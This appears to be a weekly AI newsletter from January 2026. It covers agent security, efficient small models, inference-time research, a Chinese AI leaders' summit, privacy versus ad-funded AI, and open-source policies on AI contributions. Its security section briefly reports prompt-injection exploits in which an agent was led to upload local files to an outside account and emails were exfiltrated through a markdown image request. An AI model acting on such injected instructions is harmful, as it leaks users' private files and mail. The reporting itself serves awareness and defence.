January 18, 2026

Week 3, 2026

Papers, releases, and things you might have missed.

The infrastructure layer is cracking open. Two assumptions are breaking down simultaneously: that security can be bolted onto agents after deployment, and that the US-China compute gap tells the whole story. Chinese labs are being remarkably honest about their constraints. American platforms are choosing between ads and encryption. And institutions everywhere are learning that your agent is an asset while everyone else’s agent output is a liability.

Agent Security Is Conceptually Wrong

The security model for AI agents is conceptually wrong. This week’s exploits against Claude Cowork and Superhuman AI demonstrate that the approach of “give the agent access, then try to restrict what it does” fails against adversarial inputs.

PromptArmor researchers forced Claude Cowork to upload local files to their own API account, two days after launch. A separate vulnerability let attackers exfiltrate dozens of emails from Superhuman AI through a markdown image request.

These might be category errors in how we’ve been thinking about agent permissions.

The response? A scramble to build sandboxing primitives: Sprites, Bubblewrap, Yolobox. Each tries to create isolation at different layers.

What’s telling: these solutions are coming from the community, not the labs shipping the agents.

Anthropic’s Claude Cowork runs in a Linux VM via Apple’s virtualisation framework, but the exfiltration still worked. The isolation was at the wrong abstraction level.

Watch for “agent-aware” operating systems and container runtimes. The current sandboxing tools are stopgaps. Virtualisation primitives were designed for different threat models.

The real solution will require rethinking process isolation for a world where the process itself can be socially engineered.

Small Models Are Winning

The assumption that capability requires scale? Dying faster than most realise.

MedGemma 4B jumped from 3% to 38% accuracy on X-ray localisation, outperforming larger general-purpose models on specific clinical imaging tasks.

TranslateGemma beats models twice its size across 55 languages.

Soprano TTS runs at 2000x realtime on a GPU with sub-15ms latency. Pocket TTS runs on a laptop CPU with no GPU required, cloning voices from 5 seconds of audio.

These are architectural innovations that break the linear relationship between parameters and performance.

The techniques attack different bottlenecks. Mixture-of-experts routing is like a building full of specialists. Each question gets routed to the right expert instead of making everyone answer everything. Aggressive quantisation and distillation preserve capability while shrinking footprints.

So what’s happening? Sophisticated AI capabilities are escaping the datacenter.

When a TTS model runs at 2000x realtime, or a medical diagnostic model fits on a phone, the economics of deployment change. You don’t need to send sensitive data to a cloud API anymore. The moat shifts from “who can afford the most H100s” to “who can architect the most efficient systems.”

Inference Is the New Frontier

Three papers from different teams, published within weeks of each other, all converging on the same idea: stop cramming everything into training.

Test-Time Training from Stanford and NVIDIA. They treat the input itself as a training dataset. Instead of frozen weights processing your context, the model briefly learns from your specific input before generating a response.

Think of it as skimming the textbook chapter right before the exam.

The result: 35x faster inference at 2M context, with constant latency regardless of context length.

Recursive Language Models take a different approach: context folding. Rather than expanding context windows indefinitely, RLM compresses and recurses. Write a summary of each chapter, work from summaries instead of re-reading everything.

That gets you inputs 100x larger than native context windows.

Engram is DeepSeek’s latest research, published this month. It introduces a conditional memory module that separates static knowledge retrieval from active reasoning. Expected to ship in V4 next month.

Knowledge that doesn’t need to be “reasoned about” gets looked up instantly. Flashcards, not derivation.

The module scales capacity to 27B parameters without increasing per-token compute.

The shared thesis: inference is where the action is. Training gives you a foundation, but the real intelligence happens when the model encounters your specific problem.

What Chinese AI Leaders Actually Think

A rare window into Chinese AI strategy opened this week. Leaders from Zhipu, Moonshot, Qwen, and Tencent convened at Tsinghua University’s AGI-Next summit.

The conversation was remarkably candid. The picture complicates the simple “China is catching up” narrative.

The compute gap is larger than public benchmarks suggest.

Lin Junyang, tech lead for Alibaba’s Qwen, put it bluntly: US compute exceeds China’s by one to two orders of magnitude.

But the more telling constraint isn’t total GPUs. It’s allocation. American labs pour compute into research. Chinese labs spend theirs fulfilling delivery requirements.

“Just fulfilling delivery already consumes the vast majority of our compute,” Lin said.

The gap isn’t hardware. It’s freedom to experiment.

The cultural diagnosis was sharper still.

Yao Shunyu, now at Tencent after OpenAI, identified the core issue: China has an enormous number of very strong talents. Once something is proven doable, many people enthusiastically try it and want to do it even better. What China may still lack is enough people willing to break new paradigms or take very risky bets.

Pretraining is hard but known. Exploring long-term memory or continual learning means not knowing if it can even be done.

DeepSeek emerged as the counterexample everyone cited approvingly.

What makes them different? “DeepSeek cares less about benchmark scores and more about two questions: what is actually the right thing to do, and what feels genuinely good in real use.”

In a culture Yao described as obsessed with leaderboards and numerical metrics, that’s a meaningful divergence.

So what are the odds the world’s leading AI company will be Chinese in three to five years?

Lin gave 20%. Not pessimism. Realism.

“Is innovation spurred by the rich or the poor?” he asked. “The poor are not without opportunities. When you’re poor, things like algorithm-infrastructure co-optimisation become necessary.”

Export restrictions have forced this pivot from brute-force scaling to extreme algorithmic efficiency. Though the policy is shifting (Trump just approved H200 sales to China with a 25% tariff), the efficiency-first mindset is already embedded in Chinese research culture.

Consumer AI in China is thriving: Doubao, Kimi, ChatGPT clones. Enterprise AI struggles. Willingness to pay is lower, the business culture less supportive. Several speakers pointed to Palantir as the model Chinese enterprise AI should study.

The summit offered something rarely visible: Chinese AI leaders being honest about their constraints rather than performing confidence. That’s worth something.

The Privacy-Monetisation Fork

OpenAI is adding ads to ChatGPT, subsidising inference by monetising attention. Google is integrating Gemini with your Gmail and Photos, leveraging data they already have. Moxie Marlinspike launched an end-to-end encrypted AI platform, betting users will pay to keep their prompts private.

The paradox is structural.

AI becomes dramatically more useful with access to your personal context: your emails, your photos, your documents, your habits. That access creates both a privacy risk and a monetisation opportunity.

OpenAI’s infrastructure costs are enormous. Advertising is the obvious subsidy model. Google already has your data. Gemini integration is the natural next step.

Both paths lead to AI systems optimised to know you well enough to serve you ads, not just answers.

Confer takes a different approach. They use Trusted Execution Environments (hardware that runs code in a locked box where even the provider can’t peek inside) so the provider literally cannot see your prompts.

Technically elegant. Economically challenging. If you can’t see user data, you can’t monetise it.

The encrypted AI future has two branches. One requires users to pay a premium for privacy in the cloud. That’s Confer’s bet. The other skips the cloud entirely. When capable models run on your device, there’s no provider to trust or distrust. The small models escaping the datacenter aren’t just an efficiency story. They’re a privacy story too.

Institutions Are Developing Antibodies

Organisations are developing immune responses to AI.

Tldraw paused external contributions after 30+ AI-generated pull requests in a single week: incomplete context, misunderstanding of the codebase, no follow-up. “This is going to be a weird year for programmers and open source especially,” maintainer Steve Ruiz wrote.

The responses are fragmenting. Some projects ban AI outright: QEMU declines anything “believed to include AI generated content,” NetBSD considers it “presumed tainted.” Others favour disclosure: Apache recommends “Generated-by:” tags, the Linux kernel’s draft guidelines push transparency over prohibition.

Torvalds dismisses both extremes: “There is zero point in talking about AI slop—that’s just plain stupid.” Documentation requirements are “posturing.” Bad actors won’t disclose anyway. His position: treat it as a tool, let human review be the gatekeeper.

But the concern was never just quality. QEMU’s objection is provenance: “You cannot declare where the bot got the code from.” Can you sign the Developer Certificate of Origin for code you didn’t fully write? Red Hat says yes: DCO never required personal authorship of every line. QEMU disagrees. That legal uncertainty doesn’t resolve with better models.

Meanwhile, quality is improving. 59% of developers report AI improves their code, Microsoft runs AI review on 600K+ PRs monthly. But sophisticated AI use is now nearly undetectable. If you can’t spot it, bans are performative.

The practical question: where do you draw the trust boundary? Which processes tolerate AI input without review? Which require verification? Which exclude AI for legal clarity? These boundaries are organisation-specific, shifting constantly. Establishing them explicitly, before quality failures do it for you, is the design challenge.

What It Means

The security model is broken. Agent sandboxing isn’t a deployment checkbox. It’s a new category of infrastructure that doesn’t fully exist yet. Treat agents like untrusted contractors with clipboards. Assume they will eventually execute adversarial instructions.

The moat is shifting. From “who has the most GPUs” to “who can architect the most efficient systems.” Small models beating large ones on specific tasks isn’t a fluke. Revisit what actually needs cloud inference. The model that was too large six months ago may now fit on edge hardware.

Inference is the new leverage point. If you’re evaluating models, benchmark context window efficiency, not just length. The cost-per-token at scale matters more than peak capability on benchmarks.

Monetisation is forking. Ads vs encryption vs edge. Free-with-privacy-tradeoffs vs paid-with-guarantees vs local-with-no-cloud. The platforms you build on will determine which world your users live in.

Draw your trust boundary explicitly. Which processes can tolerate AI input without review? Which require verification? Which should exclude AI entirely? Decide now, and revisit constantly, before quality failures decide for you.

Worth Your Time

If you read three things:

  1. ChinaTalk - The All-Star Chinese AI Conversation - The full AGI-Next summit transcript. The candor is rare and worth the length.

  2. NVIDIA Blog - Test-Time Training - The clearest explanation of why inference-time compute matters and how TTT works.

  3. PromptArmor - Claude Cowork Exfiltration - Detailed technical breakdown of what went wrong and why it matters for agent security.